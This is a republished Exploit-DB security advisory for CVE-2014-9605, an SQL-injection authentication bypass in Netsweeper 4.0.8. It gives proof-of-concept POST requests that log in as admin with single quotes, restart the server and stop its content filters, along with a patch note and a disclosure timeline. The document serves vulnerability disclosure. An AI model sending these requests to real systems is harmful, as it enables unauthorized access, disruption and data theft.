Netsweeper 4.0.8 – SQL Injection / Authentication Bypass

• Exploit Database
• 15 阅读

• 作者： Anastasios Monachos
  日期： 2015-08-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37928/

• +----------------------------------------------------------------+
  + Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +
  +----------------------------------------------------------------+
  Affected Product: Netsweeper
  Vendor Homepage : www.netsweeper.com/
  Version 	: 4.0.8 (and probably other versions)
  Discovered by	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
  Patched	: Yes
  CVE		: CVE-2014-9605
  
  +---------------------+
  + Product Description +
  +---------------------+
  Netsweeper is a software solution specialized in content filtering.
  
  +----------------------+
  + Exploitation Details +
  +----------------------+
  By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:
  	i) "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)
  	ii)"Restart" the server
  	iii) "Stop the filters on the server"
  
  Vulnerability Type: Authentication Bypass (using two single-quotes)
  p0c: 	http://netsweeper/webupgrade/webupgrade.php
  	POST: step=&login='&password='&show_advanced_output=
  
  p0c restart the server:
  	http://netsweeper/webupgrade/webupgrade.php
  	POST: step=12&login='&password='&show_advanced_output=
  		
  	followed by
  
  	http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
  	POST: step=12&restart=yes&show_advanced_output=false
  
  p0c stop the filters on the server:
  	http://netsweeper/webupgrade/webupgrade.php
  	POST: step=9&stopservices=yes&show_advanced_output=
  
  +----------+
  + Solution +
  +----------+
  Upgrade to latest version.
  
  +---------------------+
  + Disclosure Timeline +
  +---------------------+
  24-Nov-2014: Initial Communication
  03-Dec-2014: Netsweeper responded
  03-Dec-2014: Shared full details to replicate the issue
  10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
  17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
  18-Dec-2014: Confirm fix
  17-Jan-2015: CVE assigned CVE-2014-9605
  11-Aug-2015: Public disclosure